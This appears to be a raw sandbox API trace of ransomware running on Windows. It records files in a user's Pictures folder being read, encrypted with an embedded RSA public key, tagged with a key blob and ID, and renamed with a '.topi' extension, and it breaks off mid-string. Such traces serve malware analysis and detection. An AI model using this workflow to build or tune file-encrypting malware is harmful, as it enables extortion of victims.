[0095.664] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.664] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.664] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.664] GetLastError () returned 0x0 [0095.664] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.664] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0095.664] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.664] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.664] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.664] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.664] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6d60) returned 0x99f72d8 [0095.664] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.664] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1f98 [0095.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95a0 [0095.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1fe0 [0095.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95b8 [0095.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95e8 [0095.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9600 [0095.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.665] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95e8 | out: hHeap=0x680000) returned 1 [0095.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9600 | out: hHeap=0x680000) returned 1 [0095.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0095.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9600 [0095.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0095.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d95e8 [0095.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0095.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.665] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9600 | out: hHeap=0x680000) returned 1 [0095.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95e8 | out: hHeap=0x680000) returned 1 [0095.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.666] GetCurrentThreadId () returned 0x8c4 [0095.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f6970 [0095.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.666] GetCurrentThreadId () returned 0x8c4 [0095.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95e8 [0095.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0095.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9600 [0095.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95d0 [0095.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9618 [0095.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e80 [0095.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0095.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95e8 | out: hHeap=0x680000) returned 1 [0095.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95e8 [0095.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95e8 | out: hHeap=0x680000) returned 1 [0095.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0095.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9618 | out: hHeap=0x680000) returned 1 [0095.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9600 | out: hHeap=0x680000) returned 1 [0095.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95d0 | out: hHeap=0x680000) returned 1 [0095.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95b8 | out: hHeap=0x680000) returned 1 [0095.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f1fe0 | out: hHeap=0x680000) returned 1 [0095.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.669] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f72d8*, nNumberOfBytesToWrite=0x6d5f, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f72d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x6d5f, lpOverlapped=0x0) returned 1 [0095.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f72d8 | out: hHeap=0x680000) returned 1 [0095.670] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x6d64, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.670] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0095.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0095.670] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.670] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.670] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.670] CloseHandle (hObject=0x6a8) returned 1 [0095.673] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0095.673] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x880) returned 0x31cf750 [0095.673] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0095.673] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tIB-wQ8HCp.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tib-wq8hcp.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tIB-wQ8HCp.gif.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tib-wq8hcp.gif.topi")) returned 1 [0095.673] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.673] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.673] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.675] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0095.675] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x630dd2f0, ftCreationTime.dwHighDateTime=0x1d5be27, ftLastAccessTime.dwLowDateTime=0xf5afafb0, ftLastAccessTime.dwHighDateTime=0x1d5bae0, ftLastWriteTime.dwLowDateTime=0xf5afafb0, ftLastWriteTime.dwHighDateTime=0x1d5bae0, nFileSizeHigh=0x0, nFileSizeLow=0x167e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tyuELw6yN-Ep.bmp", cAlternateFileName="TYUELW~1.BMP")) returned 1 [0095.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0095.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0095.675] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.675] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tyuELw6yN-Ep.bmp") returned=".bmp" [0095.675] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tyuELw6yN-Ep.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tyuelw6yn-ep.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.675] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=92132) returned 1 [0095.675] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.678] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x167be, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.678] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.678] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.678] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.678] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.678] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x167e4, lpOverlapped=0x0) returned 1 [0095.679] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.679] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.679] lstrlenA (lpString="-----BEGIN PUBLIC 